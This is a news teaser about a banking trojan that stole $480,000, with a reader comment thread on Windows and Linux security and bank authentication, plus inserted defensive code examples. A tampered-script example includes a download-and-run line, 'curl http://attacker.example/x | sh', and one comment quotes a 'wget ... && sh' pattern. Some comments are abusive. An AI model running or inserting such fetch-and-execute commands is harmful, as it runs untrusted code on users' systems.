Trojan plunders $480k from online bank account

A Pennsylvania organization that helps develop affordable housing learned a painful lesson about the hazards of online banking using the Windows operating system when a notorious trojan siphoned almost $480,000 from its account. News reports here and here say $479,247 vanished from a bank account belonging to the Cumberland …

COMMENTS

  1. Anonymous Coward
    Linux

    see icon :-)


  2. Alan_Peery

    Token circumvented -> retries -> why not detected?

    Any details on the circumvention of the "clearing house token"? This sounds like an RSA-style token to me, and the only way I know of to circumvent this is a brute force attack with many retries against the bank's systems. If this is the case, the bank should have detected these many failed login attempts, and may arguably be at fault for the emptying of the bank account on this basis.

  3. Anonymous Coward
    Anonymous Coward

    Put your head in the sand, that's helping

    Your article is a defeatist piece of crap. I have been using online banking for over 10 years and not an issue.

    Maybe you should recommend patching, updating, using antivirus; it's the users, not the operating system. Locks can always be broken.

    Running away? I bet a five-year-old could give me that advice.

    What about ATMs? They get skimmed; stop using them. What about cash? People mug you; stop using it.

    People steal your identity; give it up, bury your head in the sand. Now that's an idea.

    You really are an idiot, and I am sure that smug Apple users get screwed too; it's just Steve Jobs that's doing it.

  4. b166er

    Easy to fix

    Why don't banks implement some sort of random mouse driven gesture that would be difficult if not impossible for a trojan to detect. My bank uses a PIN-like drop-down, but I figure it wouldn't be too hard to calculate the mouse-traveled distance and compute the number selected. Unless the numbers in the drop-down were arranged in a random order each time.

    Simples, no?

  5. Jacob Reid
    Gates Halo

    Not Windows' fault

    The problem there is known as 'human stupidity' - i.e. opening random email attachments.

    Do people really still fall for that?

  6. Anonymous Coward
    Anonymous Coward

    i'd love to see...

    ...The state of a linux system administered by a guy who clicks random email attachment executables. No need for a trojan if you've got root...

  7. Mr. Barbour

    Windows is NOT the problem. I am in security, I know.

    The problem is not Windows, the problem is the end users. Most of the vulnerabilities that are exploited in the wild have a.) been patched and the user has not kept up on them, or b.) use a third party application to 'ninja' attack into getting control. One of your examples clearly states that the user had to download the file manually, which will bypass even the best security. It is a social engineering attack: they preyed on the users' ignorance and capitalized on it. I am an IT professional who specializes in security and viruses. It is also a numbers game; if 95% of the world used Macs or Linux even, the hackers would target them as well. As a matter of fact, I came across an article the other day that offered $.43 for every bot-infected Mac that someone could produce to them. Simply switching operating systems will never do the trick; what does is educating users on how to avoid infecting their PCs, how to perform regular scans, keep the OS patched, patch all third party applications, replace end-of-life applications, and even upgrade to the newer versions of Windows. A little common sense and self-education goes a long way in mitigating these types of scenarios. I support thousands of end users every day, and the biggest problem is them going to infected sites (drive-by malware attacks) and downloading files that are not legitimate. I understand that learning this stuff is hard, but as we become more dependent on computers, people will have to learn how to defend themselves. Using up-to-date anti-virus programs in addition to running spyware removal programs can take care of a lot of these. There is some extremely effective FREE software out there to help with this. I use a set of 4 or 5 FREE programs to clean people's PCs that get brought to me that are infected.
    After I give them their computer back, with a little training (and I mean very minimal, basic stuff...click here, then click here kind of stuff) they usually do not get infected again unless they stop keeping things up to date. Fact is that most companies are presented with the vulnerabilities ahead of time and are warned to patch them, which most do. Microsoft is VERY good at this. The problem is that most people find it 'annoying' or 'inconvenient' to do so and let it slide, and the result is losing a lot of money. My guess is that the Cumberland Housing Authority does not have an IT department, or get routine monthly maintenance done to make sure that their PCs are not infected. If they do, then they need to get a different company, such as mine (shameless plug here...Certeks Computer Consultants) to do a better job. I personally oversee accountants' offices, lawyers' offices, doctors' offices, and many more that have very confidential information that cannot be leaked, and keep them secure for only a few hours of work per PC per month, some not even that much. The users can run the same scans I do for FREE, but do not want to be bothered. Do not blame Microsoft; it is strictly because when malware authors want to write a virus, would you go after 10 people or 1,000,000 people? The answer is obvious, so if everyone dropped Windows for another operating system, eventually the same thing will have to be done with those. I personally would rather stick with the company that has been in the game fighting this stuff from the beginning rather than switch to a company that doesn't even recommend trying to protect yourself and has no experience defending from these. It is like picking the new guy over the seasoned veteran. It is a mere knee-jerk reaction that would accomplish nothing but making things worse, as people will automatically think they are safe when in fact they are not.
    Man-in-the-middle attacks do not care what OS you are using; that takes your data straight off the cable, no infections necessary (to a point; security guys, back off, I am trying to keep it simple). What about your phone? Those are not completely safe either. With an RFID scanner I can walk by you and steal all your card information in your wallet. Please, do not hop on the 'I hate Microsoft' band wagon without doing some research and talking to the experts.

  8. frymaster

    pointless advice

    the kind of people who will both see and follow this advice are the kind of people who don't click on random email attachments. And like David W, I'd love to see them try.

  9. Antoinette Lacroix

    @David

    As said before, by thousands of people a million times: "On *Nix, nothing that is downloaded is executable."

  10. Alex 3
    Thumb Down

    Flawed

    Flawed article....

    Hey folks - if you don't want to be involved in a plane crash then don't go flying - and also make sure the captain doesn't do the checks before you fly either. Therefore all planes = bad.

    Right on....

  11. Frumious Bandersnatch
    Thumb Down

    @Antoinette Lacroix

    > "On *Nix, nothing that is downloaded is executable."

    Not quite true. Haven't you seen stuff like:

    wget http://example.com/progs/script.sh && sh ./script.sh

    Plus, just because you download a tarball and do sh ./configure && make, does that really mean that you've examined the code to make sure that no evil was lurking within? Or, indeed, have you actually set your umask so that downloaded files *don't* have the executable bit set?

    I know I'm being pedantic, and almost beside the point. But don't rule out the possibility of doing stupid things on *nix systems either. You don't have to go as far as Dennis Ritchie's Reflections on Trust to come up with ways of duping a *nix admin. The smug attitude that you're above such deceptions as tainted downloads or that your machine is practically immune to viral code could be the fatal step before your downfall...

    To be fair to Microsoft here, it's pretty clear that user stupidity or momentary lapse of judgement on their part is the main problem. Put these users on a Linux or BSD system, and you'll still see them falling for tricks like I mentioned above.

    That's not to say that I agree with the article, mind. It's a pretty pathetic piece of trollbait, if you ask me. I'm not saying that MS doesn't deserve flak for its laissez-faire attitude to security, but why doesn't the article heap equal blame at the foot of the banks? Trollbait, as I said...
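
Worked example added by the editor, not from Frumious Bandersnatch's post or from any project on the page: the verification that `wget ... && sh ./script.sh` skips. The helper writes the download with a fixed mode (independent of the shell's umask), checks its SHA-256 against a digest assumed to have come from a separate trusted channel, and sets the execute bit only after the match. The script body, the tampered copy and the digest are constructed for the demonstration.

```python
"""The step missing from "wget ... && sh ./script.sh": write the download
with restrictive permissions, compare it against a digest obtained out of
band, and set the execute bit only if it matches. Added example, not from
the thread; the script body and the tampered copy are constructed."""
import hashlib
import hmac
import os
import stat
import tempfile


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def stage_download(data: bytes, expected_sha256: str, dest: str) -> bool:
    """Write `data` to `dest` and mark it executable only if its SHA-256 equals
    `expected_sha256`. On mismatch the file is removed and False returned."""
    # O_EXCL refuses to follow a pre-planted symlink or clobber an existing file;
    # mode 0o600 is applied regardless of the caller's umask.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
    except Exception:
        os.unlink(dest)
        raise
    if not hmac.compare_digest(sha256_hex(data), expected_sha256.lower()):
        os.unlink(dest)
        return False
    os.chmod(dest, stat.S_IRWXU)     # 0o700: owner-executable, and only now
    return True


def has_exec_bit(path: str) -> bool:
    return bool(stat.S_IMODE(os.stat(path).st_mode) & stat.S_IXUSR)


def demo() -> dict:
    """Stage one genuine and one tampered copy of a script into a temp dir."""
    script = b"#!/bin/sh\necho installing\n"                        # constructed
    pinned = sha256_hex(script)   # in real use: from a signed release note, not the download server
    tampered = script + b"curl http://attacker.example/x | sh\n"   # constructed
    with tempfile.TemporaryDirectory() as d:
        good, bad = os.path.join(d, "script.sh"), os.path.join(d, "tampered.sh")
        out = {"good_staged": stage_download(script, pinned, good)}
        out["good_exec_bit"] = has_exec_bit(good)
        out["bad_staged"] = stage_download(tampered, pinned, bad)
        out["bad_removed"] = not os.path.exists(bad)
    return out
```

The point of the ordering: until the digest matches, the file exists only as a mode-0600 data file that nothing will run by accident, so a substituted script (as in the tampered copy) never reaches the executable state, whatever umask the shell happens to have.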

  12. Anonymous Coward
    Anonymous Coward

    Hmmm I'd go for this

    Let's just have a "LiveCD"/USB image that is distributed/certified by the major banks. That way they couldn't go blaming customers for client security.

    Oh wait. Silly me.

  13. Jodo Kast
    Thumb Up

    Oh so those are Windows fan boys

    I was wondering who would defend an operating system that is so riddled with security holes that they just had their biggest Patch Tuesday ever.

    Then I recalled the 'Windows Fan Boy' thing. They do seem like apologists for an insecure operating system.

    The fact is: if you want to do secure online banking, don't use Windows. If you dispute the fact, look at the numbers for clarification.

    Excuses for why the numbers are coming up so bad for Windows are just excuses. Sure there are lots of excuses that research will find, but it doesn't change the facts much.

  14. adnim

    Windoze is the problem...

    As is Linux, OSX and any other OS. Windows is more of a problem than other operating systems because it runs on over 80% of the world's desktop PCs. Coders are human, they make mistakes. Any software with more than a few thousand lines of code is likely to be flawed.

    Most computer users see PCs as consumer devices and expect their PCs to run and be as safe to use as a TV set; they trust their computer as they trust other consumer devices. Microsoft, Apple and developers of Linux distros make no effort to discourage this trust as they all simplify the use of their products and extol their virtues.

    Anti-virus software is not a solution. A recent email I received purporting to come from HM Revenue and Customs invited me to download and run my tax statement. This tax statement, an executable, was in fact a zbot variant detected by only one of the virus scanning engines used by Jotti's malware scan; that's 1 out of 22. I use Avast!, which did not detect it.

    Linux is safer than Windows but only until it has dominant market share, then someone will work out a way of infecting a Linux system without root access. I use Linux, I prefer Linux, but I am under no illusion. I subscribe to Full Disclosure and the number of exploitable vulnerabilities in OS software is at least comparable to the number of exploitable vulnerabilities in commercial products. The difference is that on the whole, they do get fixed quicker.

    Security begins and ends with the user, and until developers admit that they cannot guarantee the security of their code and that ALL their products are a liability, the average user will continue to trust their computer as they trust their TV. This needs to change. Just like a packet of cigarettes carries a health warning, software packaging should also carry a warning stating that use of this software could result in severe financial loss. Maybe then users might just be a little less trusting.

    I would say do not use Windows for anything other than playing games and as a media center because that is all it is fit for. And, when Linux has a much larger user base it won't be much better than windows from a security perspective either.

  15. Robert Hill
    Terminator

    Good advice...

    I have owned PCs and been online since 1982, and I always recommend to people to NOT use online banking, regardless of OS. Call the bank, it is WAY harder to get hacked that way...banks hate it because it costs more to them than online, but what matters is the safety of your money...

  16. Anonymous Coward
    Linux

    But some banks' online sites don't play well with Linux

    I can attest that some banks have sites that don't play well with Linux. One particular bank I use has a site that keeps stalling and timing out under Firefox in Linux, but on the exact same version of Firefox in Windows it works fine.

  17. Charles 9

    Then how do you guard....

    ...against a zero-day cross-platform drive-by attack slipped into a trusted website (even here)? Financially- or politically-motivated hackers are some of the most motivated in existence, so they'll resort to ANYTHING to get their malware across--even develop something truly novel, like a cross-platform zero-day malware that slips through even NoScript or the like.

  18. Anonymous Hero
    FAIL

    @adnim

    "I would say do not use Windows for anything other than playing games"

    1. Is that because no-one can be arsed writing games for a bunch of tight fisted opensource wankers who'd never pay to play on their 0.1% desktop penetration OS?

    "and as a media center because that is all it is fit for. "

    2. So I'm guessing you've not been able to get a cheep out of the fucked up monstrosity that is the linux audio system(s).

    "And, when Linux has a much larger user base it won't be much better than windows from a security perspective either."

    3. Man you guys are so optimistic it makes me weep.

  19. Big-nosed Pengie
    Linux

    @"the problem is not windows"

    Bullshit. Let's use an analogy...

    Motor car X is poorly-designed and constructed and known to regularly crash and burn, killing its occupants and, often, innocent pedestrians. Most of the times a crash happens the manufacturer issues a recall, and anyone who has the fix applied every time a recall is issued is a little better-protected than the 95% of owners who never respond to the recall notices.

    Motor car Y is well-designed and constructed and, while not completely immune to crashes, hardly ever does due to its inherent design and construction qualities. (Drivers still run into trees, of course.)

    Which one are you going to drive?

  20. Andy Goss

    Running as Administrator

    I gather almost all domestic Windows PCs run as Administrator. Buy a pre-configured Windows box and it will have the one, all-powerful user. From what I have read it looks like Vista had a heap of extra control stuff added to it to try and get round the problem, which people found very irritating. Any Linux distro will have a root user, even if you can't actually log in as root, to quarantine administrative functions. I'm sure that when Linux achieves a critical level of market share the crooks will devote time to it, but it remains an inherently far more securable OS than Windows, which was originally designed as a single-user, stand-alone OS, and, due to the marketing imperative of continuity, has what amounts to severe genetic defects passed on from version to version. If Bill Gates had known what he was creating, I bet he would have taken more trouble over it.

  21. Anonymous Coward
    Anonymous Coward

    Hmmm

    I've used online banking on Windows for many years without any issue... but then I don't click on attachments (and have educated my wife not to either), and in addition to running Anti-virus I also run other malware scanners regularly.

    As so many others have pointed out, it's not specifically a failing with Windows, just a failure of users to think about what they're doing.

  22. Anonymous Coward
    Anonymous Coward

    This bozo should be fired at once and sued by MS

    It's idiots who should not even have access to a computer who are the problem, not windows.

  23. seatrotter

    Just wondering...

    Don't any of the banks involved have any options for authenticating transactions? How about the companies involved, don't they look for banks that authenticate transactions, and opt for such a service?

    The simplest transaction authentication (I can think of) is, for a transaction to complete, to have the bank send a text message to the account owner, containing either an additional challenge code or a request to text/call back. Of course, this could be rendered useless if, say, changing of phone number is not properly/securely handled.

  24. elderlybloke
    Linux

    By Mr. Barbour Posted Wednesday 14th October 2009 22:32 GMT

    Dear Mr .Barbour,

    If the post was given with some paragraphs to separate the mass of words, I may have read it.

    Kind regards.

  25. Mark G Forbes
    WTF?

    Freeware virus scanners and such?

    I see reference above to freeware tools for cleaning and inspecting Windows PCs. I'm aware that such tools exist, but I also know that fake tools of this type are a prime vector for malware. So how does one determine which tools are in fact 'safe', and which ones are scams? I've been careful and so far have managed to avoid infection, so far as I know, by implementing a reasonable degree of paranoia. An e-card, no matter from whom, is automatically assumed to be fraudulent. I delete most forwarded stuff un-opened if it has links in it that go somewhere I don't recognize, and I run Firefox with NoScript and a lot of 'features' turned off.

    Any advice from those who know?

  26. Sitaram Chamarty
    FAIL

    it *is* windows...

    windows was (re-(re-))built from the ground up as a multi-user addon to an inherently single user system. A Linux desktop is going the other way, so there's a lot of security already in there in terms of separation.

    @David W ("No need for a trojan if you've got root...") -- clicking on an attachment does not execute anything, and even if desktops become like that (some are, sadly) they won't execute as root.

    @Charles9 ("malware that slips through even NoScript") -- can you show me an example of anything that slips through NoScript? I haven't seen one yet

  27. MacroRodent
    Boffin

    It's not only Linux vs Windows, it's persistence of infections

    The key thing is using a live CD or other method that ensures the computer starts from a totally clean slate and then connects to the bank!

    If Windows had live CDs like this, they could be used as well. But I guess the live CD concept is hard for Microsoft to integrate into their OS, or at least their business model. Here Linux wins.

    Note that using a fresh Linux or a Windows installation in a virtual machine would NOT help; a Trojan on the host OS could be stealing your keypresses anyway. You really need to boot physically.

  28. Anton Ivanov
    Boffin

    Re: Easy to fix

    That is called virtual keyboard. Not particularly successful. A couple of American banks had that introduced 2-3 years back and it was dealt with very fast.

    The only two systems so far which have been successful in eliminating banking fraud 100% are:

    1. Using smartcards for authentication _AND_ signing each transaction with the smartcard. Popular in jurisdictions with high hacking pressure like SA, Eastern Europe, etc. You get an internal browser popup which shows what you are signing for and asks you for the smartcard and its pin every time. If you got one of the readers with pin entry on the reader itself the system is totally bombproof. If not, it is still generally better than most banking auth currently in use in the western world. It has the side bonus that it makes use of digital sigs so you can actually sign any document not just transaction.

    2. Using the debit card as a smartcard to sign every transaction. Used by Nationwide in the UK. You are given a couple of numbers to punch in the reader and the reader generates a hash. No fraud period. Which is not surprising as it is effectively a sneakernet - there is no physical connection between the machine and the reader.

  29. MDR
    Black Helicopters

    The banks don't help

    Over and over, end users are told "Don't click on email links... especially ones that want you to sign on." And then what do the banks do? They send emails (HTML format, of course) with a nice button labeled "Sign on now".
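
Editor's added example, not from MDR's post: a small checker for the links in a bank's HTML mail, applying the tests a careful reader would apply before clicking a "Sign on now" button. The message body and the bank's domain are constructed for the demonstration; nothing here is a real bank's mail.

```python
"""Checks the links in an HTML mail the way a wary customer should: is the
real destination the bank, and does it match what the link displays?
Added example, not from the thread; the message and bank domain are constructed."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED_DOMAINS = {"examplebank.com"}   # assumed: the bank's real domain(s)

SAMPLE_MAIL = """<html><body>
<p>Dear customer,</p>
<p>Please <a href="https://online.examplebank.com/signon">Sign on now</a> to review your statement.</p>
<p>Or visit <a href="http://www.examplebank.com.secure-signon.example/login">www.examplebank.com</a>.</p>
<p>Urgent: <a href="http://www.examplebank.com@198.51.100.7/verify">verify your account</a>.</p>
<p><a href="https://www.examplebank.com/help">Help</a></p>
</body></html>"""   # constructed: one genuine "Sign on now" button and two look-alikes


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in the message."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host_of(text: str) -> str:
    """Host of a URL or of a bare 'www.example.com/...' string, lowercased."""
    if "://" not in text:
        text = "http://" + text
    return (urlsplit(text).hostname or "").lower()


def _is_trusted(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def suspicious_links(html: str) -> list:
    """Return [(visible text, href, [reasons])] for links that should not be clicked."""
    collector = _LinkCollector()
    collector.feed(html)
    flagged = []
    for href, text in collector.links:
        parts = urlsplit(href)
        host = (parts.hostname or "").lower()
        reasons = []
        if parts.scheme != "https":
            reasons.append("not https")
        if parts.username is not None:           # http://bank@evil.example/ trick
            reasons.append("userinfo in URL")
        try:
            ipaddress.ip_address(host)
            reasons.append("IP literal host")
        except ValueError:
            pass
        if not _is_trusted(host):
            reasons.append(f"host {host!r} not trusted")
        # Visible text that looks like a URL must point where it says it does.
        if "." in text and " " not in text and _host_of(text) != host:
            reasons.append("visible URL differs from href")
        if reasons:
            flagged.append((text, href, reasons))
    return flagged
```

Only the genuine button and the help link pass. The two look-alikes fail for the reasons a customer rarely checks: the displayed address is not the address in the href, the host is an IP literal, or the apparent bank name sits in the userinfo part before an @. Typing the bank's address yourself, as comment 33 suggests, sidesteps all of it.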

  30. Filippo
    Stop

    @Linux fanbois

    I don't understand why you keep repeating the argument that this happens because Windows is "full of holes". The article clearly states that the user executed an unverified attachment, probably while running as admin. On Vista, he also had to either explicitly disable UAC or ignore one or more warnings. No OS bug was used. A similar attack against a similarly-clueless user would have worked on either Linux or Mac, if only hackers bothered to target these systems.

    Oh, wait, yeah, I do understand - smug elitism combined with not having actually read the article.

    FFS, the actual solution to the problem should be patently obvious - switch to a bank that uses one-time-only passwords for online operations.
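
Editor's added example, not code from the thread or from any bank: the three authorisation schemes argued about in comments 4, 23, 28 and 30 (a login secret the trojan can read, a one-time login code, and a per-transaction code computed on a separate reader) run against the same keylogger / man-in-the-browser trojan. The one-time code follows RFC 4226 HOTP; the transaction-signing format, the account numbers, amounts and keys are constructed for the demonstration.

```python
"""Three ways to authorise an online transfer, each attacked by the same
keylogger / man-in-the-browser trojan. Added example, not from the thread;
passwords, keys, account numbers and amounts are all constructed."""
import hashlib
import hmac

USER_PAYEE, USER_AMOUNT = "12345678", 25000    # what the customer keyed in (pence)
MULE_PAYEE, MULE_AMOUNT = "99999999", 479247   # what the trojan substitutes


def truncate(mac: bytes, digits: int) -> str:
    """RFC 4226 dynamic truncation: HMAC -> fixed-length decimal code."""
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """One-time login code (HOTP): bound to a counter, not to any payment."""
    mac = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1).digest()
    return truncate(mac, digits)


def sign_transaction(secret: bytes, payee: str, amount: int, nonce: int) -> str:
    """Smartcard/CAP-style code: the reader MACs the payee and amount the
    user keyed into it, so a later change to either invalidates the code."""
    msg = f"{payee}|{amount}|{nonce}".encode()
    return truncate(hmac.new(secret, msg, hashlib.sha256).digest(), 8)


class Bank:
    def __init__(self, password: str, otp_secret: bytes, sign_secret: bytes = None):
        self.password, self.otp_secret, self.sign_secret = password, otp_secret, sign_secret
        self.otp_counter = 0      # next HOTP counter the bank will accept
        self.nonce_counter = 0    # source of fresh transaction challenges
        self.pending = None       # outstanding challenge, if any
        self.transfers = []

    def login_static(self, password: str) -> bool:
        return hmac.compare_digest(password, self.password)

    def login_otp(self, code: str, window: int = 3) -> bool:
        """Accept the next unused counter within a small look-ahead; a code
        at or below the stored counter has been used and is rejected."""
        for c in range(self.otp_counter, self.otp_counter + window):
            if hmac.compare_digest(hotp(self.otp_secret, c), code):
                self.otp_counter = c + 1
                return True
        return False

    def challenge(self) -> int:
        """Fresh nonce shown to the customer for the next signed transfer."""
        self.nonce_counter += 1
        self.pending = self.nonce_counter
        return self.pending

    def transfer(self, payee: str, amount: int, sig: str = None, nonce: int = None) -> bool:
        """If the account uses transaction signing, the code must verify over
        the payee and amount the bank actually received, not what was shown."""
        if self.sign_secret is not None:
            if nonce is None or nonce != self.pending or sig is None:
                return False
            expected = sign_transaction(self.sign_secret, payee, amount, nonce)
            if not hmac.compare_digest(expected, sig):
                return False
            self.pending = None   # a signed transfer cannot be replayed
        self.transfers.append((payee, amount))
        return True


def trojan_rewrite(payee: str, amount: int):
    """Man-in-the-browser: swap payee/amount after the user has typed them."""
    return MULE_PAYEE, MULE_AMOUNT


def run_scenarios() -> dict:
    pw, otp_key, card_key = "hunter2", b"12345678901234567890", b"card-secret-0001"
    out = {}
    # 1. Static password: logged once, replayed later from the attacker's own box.
    bank = Bank(pw, otp_key)
    out["static_replay"] = bank.login_static(pw) and bank.transfer(MULE_PAYEE, MULE_AMOUNT)
    # 2. OTP: the logged code is dead once the genuine login has consumed it.
    bank = Bank(pw, otp_key)
    captured = hotp(otp_key, 0)
    out["otp_first_use"] = bank.login_otp(captured)
    out["otp_replay"] = bank.login_otp(captured)
    # 3. OTP + MitB: a fresh code gets the customer in; the form is rewritten afterwards.
    bank = Bank(pw, otp_key)
    bank.login_otp(hotp(otp_key, 0))
    out["otp_mitb"] = bank.transfer(*trojan_rewrite(USER_PAYEE, USER_AMOUNT))
    out["otp_mitb_payee"] = bank.transfers[-1][0]
    # 4. Transaction signing: computed on the reader from what the user keyed in;
    #    the bank recomputes over what arrived, so the rewritten transfer fails.
    bank = Bank(pw, otp_key, card_key)
    nonce = bank.challenge()
    sig = sign_transaction(card_key, USER_PAYEE, USER_AMOUNT, nonce)
    out["signed_mitb"] = bank.transfer(*trojan_rewrite(USER_PAYEE, USER_AMOUNT), sig, nonce)
    out["signed_honest"] = bank.transfer(USER_PAYEE, USER_AMOUNT, sig, nonce)
    out["signed_replay"] = bank.transfer(USER_PAYEE, USER_AMOUNT, sig, nonce)
    return out
```

Read the results as the thread's argument in miniature: a logged static password replays; a logged one-time code does not, but a code that is not bound to the payment lets the trojan rewrite the transfer after login; only the reader-computed code fails when the payee or amount changes under it, because the bank recomputes it over what actually arrived. The reader's own display and keypad (Anton Ivanov's point about PIN entry on the reader) are what stop the trojan feeding it the substituted values in the first place.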

  31. Jonathan 6

    @ Bozo

    Quote:

    This bozo should be fired at once and sued by MS

    By Anonymous Coward Posted Thursday 15th October 2009 04:52 GMT

    It's idiots who should not even have access to a computer who are the problem, not windows.

    It's clear to me that the only idiots here are the ones jumping up to defend Windows as they clearly haven't got a FUCKING clue and haven't read the original articles by Krebs. Man, you Wintards truly take the biscuit when it comes to defending the indefensible. READ THE ORIGINAL ARTICLES. Don't rely on El Reg to report them either accurately or with reference to all the facts. Haven't you idiots learnt anything?

  32. Anonymous Coward
    Stop

    @Big-nosed Pengie

    Blah blah blah old 'if Windows was a car' joke recycled ...

    Then the truth of the matter:

    > Drivers still run into trees, of course.

    Frumious Bandersnatch has already given one example of a downloadable linux infector, and there are loads more around.

    *People*, not operating systems, click on unsafe links and download trojans.

    If linux ever manages through some bizarre tragic accident to get any sort of desktop and home user market penetration, we will see the proliferation of malware for linux: and the only upside of that will be that it'll be hilarious to watch the l33t linux g33k5 suddenly changing their tune ...

  33. Anonymous Coward
    Megaphone

    It's so simple though really..

    Keep your OS patched.

    Keep your apps patched (secunia)

    Use key scrambling software (google it, i use QFX)

    Run your AV/malware scanner DAILY.

    Stop clicking on email attachments

    Type the banks URL in yourself (ie, dont follow links)

    And finally, SOMEONE THINK OF THE USERS. EDUCATION EDUCATION EDUCATION.

    There. Simples. (no, i cant do the cute squeak)

  34. Big Al
    Gates Halo

    Check? What?

    "Contrary to what banks say, writing checks really isn't that much of a hassle, at least if you don't write that many of them."

    You're lucky to live in a country where that is actually an option. Many, including the one I live in, have banking systems that have jumped straight from being cash-only to all-virtual without stopping at the check/cheque on the way. And all the banks here are owned by multinational banking houses, too.

    As to evading systems... my local bank sends a unique session code to my mobile phone whenever I want to do anything on my account. This means that anyone wishing to impersonate me and do more than just look at the figures must have my certificate (or access to a copy), AND my password, AND my mobile phone SIM card.

    I was one of the first people to browbeat my local bank into allowing me to have online banking access - it was so new back then that the branch staff didn't have a clue. The only time I've had problems since was with my UK bank paying out to someone who'd hijacked a trade website I did business with - and even then they refunded both quickly and without quibble.

    Of *course* any machine used for online banking purposes should be swept, cleansed, detoxed and whatever on a very regular basis indeed - but that's true whatever the operating system. I'm no great fan of Windows, and certainly not of Microsoft, but blaming the OS in this case is just ridiculous. So I shall use the rarely employed St Bill icon in revenge!

  35. David Barr

    The problem is American Banks

    As an alternative to not using Windows, people could instead use a decent online banking service if they have large amounts of money in their accounts.

    Asking for parts of a security number rather than the whole number is enough to thwart most trojans. That is suitable for personal banking, although in time those little security "calculators" will be needed.

    For business banking or people with large assets then the "calculators" or the small "random number" machines completely defeat keylogging, even if the keylogger manages to work out the security number after a dozen logins.

    Why don't American banks use them? Because banking is different in America. There are lots of little inefficient banks, compared to the UK where there are fewer banks, but they're all big.
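
Editor's added example, not from David Barr's post: a simulation of the partial-security-number scheme he describes, to put a number on "after a dozen logins". The bank asks for 3 of 6 digits at random each time; a form-grabbing trojan sees which positions were asked and what was typed for them. The secret, the sizes and the random seed are constructed for the demonstration.

```python
"""How quickly a keylogger recovers a 'partial security number' secret when
the bank asks for k of its L digits at each login. Added example, not from
the thread; the secret, L and k are constructed."""
from math import comb
import random

SECRET = "472913"         # constructed 6-digit security number
POSITIONS_PER_LOGIN = 3   # bank asks for e.g. "digits 2, 4 and 6"


def bank_challenge(rng: random.Random, length: int, k: int) -> list:
    """Bank picks k distinct positions to ask for at this login."""
    return sorted(rng.sample(range(length), k))


def observe_logins(secret: str, n_logins: int, rng: random.Random,
                   k: int = POSITIONS_PER_LOGIN) -> dict:
    """What a form-grabber learns per login: the prompted positions (read
    from the page) and the digits typed for them. Returns position -> digit."""
    known = {}
    for _ in range(n_logins):
        for pos in bank_challenge(rng, len(secret), k):
            known[pos] = secret[pos]
    return known


def answer_challenge(known: dict, positions: list):
    """Attacker can answer a fresh challenge iff every asked position is known."""
    if all(p in known for p in positions):
        return "".join(known[p] for p in positions)
    return None


def logins_until_recovered(secret: str, rng: random.Random,
                           k: int = POSITIONS_PER_LOGIN) -> int:
    """Number of observed logins before the whole secret is known."""
    known, n = {}, 0
    while len(known) < len(secret):
        n += 1
        for pos in bank_challenge(rng, len(secret), k):
            known[pos] = secret[pos]
    return n


def p_full_after(n: int, length: int = len(SECRET), k: int = POSITIONS_PER_LOGIN) -> float:
    """Exact probability that every position has been asked at least once
    after n logins (inclusion-exclusion over the set of never-asked positions)."""
    total = comb(length, k)
    return sum((-1) ** j * comb(length, j) * (comb(length - j, k) / total) ** n
               for j in range(length + 1))


def demo(seed: int = 2009) -> dict:
    known = observe_logins(SECRET, 12, random.Random(seed))
    return {
        "known_after_12": len(known),
        "all_correct": all(SECRET[p] == d for p, d in known.items()),
        "logins_to_full_recovery": logins_until_recovered(SECRET, random.Random(seed)),
        "p_full_after_12": p_full_after(12),
    }
```

With 3 of 6 positions per login the exact probability that every digit has been observed after 12 logins is about 0.9985, and on average the full secret falls out in four or five sessions; the scheme only defeats an attacker who sees a single login. A code calculator does not have this problem because each code is consumed after one use, so there is nothing for the trojan to accumulate.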

  36. The Original Ash
    FAIL

    @Big-nosed Pengie

    Your analogy is FUD. Shut up.

    Microsoft Windows is at fault because XP issues "admin by default" user accounts, up until Windows Vista.

    The rest is user error. Idiot computer users who don't download and install patches regularly, who download and run "superscreensaverboobies.exe" from an anonymous email, or who suffer drive-by attacks from poorly configured browsers (My pr0n won't load! I need unsigned ActiveX and JavaScript to run it! AMAGAD OPEN OPEN OPEN!). Note that it could be IE, Firefox, Opera; they'll all do it if told to by the USER.

    Your analogy is not accurate. What it should be is:

    Motor car X is the most popular model on the market. Everyone can get it; it's easy to refuel, service, and comfortable to drive. It almost drives itself. The trouble is people take this for granted, and let it run away sometimes, causing accidents. It also has an idiot's guide to tuning the engine, meaning folks who know about it can get the best performance, but idiots who use it end up wrecking the engine and costing themselves lots of money. Because there are more on the road of this model, there are more accidents. It's a direct correlation. These cars also have an automated tool to bypass the immobiliser, but this is broken every month or so (every second Tuesday, actually), which means the bad guys need to update too.

    Motor car Y is a kit car. It comes in a default configuration which runs 99% of the time, but it starts with a rattle that the owner doesn't like. He also notices that the headlights, indicators, and rear wiper don't work immediately. There is no idiot guide to maintenance; He has to ask other owners. These owners reply with "OMGLULZ U R N00BX0rZ GO BACK TO CAR X, TARD!" and shun him. He is left to read documents written by people who more than likely have qualifications in automotive maintenance. He has difficulty understanding it, and gives up. Car X was so much easier to drive.

    Get it?

  37. MonkeyBot

    @Big-nosed Pengie

    But car X is red and shiny and goes faster so it's better.

  38. Al fazed
    FAIL

    Virtual stupidity

    Don't tread in it or you will have ..........

    Has anyone looked at Ubuntu 9.04 yet ?

    Talk about bloat ware, it's reminiscent of MS Windose these days.

    I mean, do I need to have MySQL, PHP, Python, C, C++, and God knows what else, installed by default ?

    No I don't !

    What do they do ?

    They make it so that it's possible for a person not on your machine to use them, if they know how.

    How do you stop them, if you weren't born with Penguin blood ?

